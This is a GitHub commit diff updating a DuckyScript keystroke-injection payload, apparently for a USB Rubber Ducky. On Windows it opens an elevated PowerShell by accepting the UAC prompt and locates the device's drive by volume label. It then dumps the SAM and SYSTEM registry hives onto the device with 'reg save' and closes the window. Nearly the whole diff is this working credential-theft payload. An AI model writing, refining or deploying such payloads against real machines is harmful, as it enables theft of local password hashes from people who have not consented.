Update payload.txt

pull/481/head
Mavis Coffey 2024-10-22 14:41:32 -04:00 committed by GitHub
parent 8be0f9a092
commit 61eb88ab6c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 10 additions and 6 deletions

View File

@ -47,24 +47,28 @@ EXTENSION PASSIVE_WINDOWS_DETECT
END_IF END_IF
END_REM END_REM
END_EXTENSION END_EXTENSION
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL DUCKY
IF ($_OS == WINDOWS) THEN IF ($_OS == WINDOWS) THEN
INJECT_MOD GUI R GUI r
DELAY 500 DELAY 500
STRING cmd STRING powershell
DELAY 1000 DELAY 1000
CTRL-SHIFT-ENTER CTRL-SHIFT-ENTER
DELAY 750 DELAY 750
LEFT LEFT
ENTER ENTER
DELAY 1000 DELAY 1000
REM Change $DRIVELABEL to the storage label of your duck STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
DEFINE #DRIVELABEL D: DELAY 250
STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save STRINGLN reg save HKLM\sam $DriveLetter/sam.save
WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY WAIT_FOR_STORAGE_INACTIVITY
STRINGLN reg save HKLM\system #DRIVELABEL/system.save STRINGLN reg save HKLM\system $DriveLetter/system.save
WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ELSE ELSE
ATTACKMODE OFF
STOP_PAYLOAD STOP_PAYLOAD
END_IF END_IF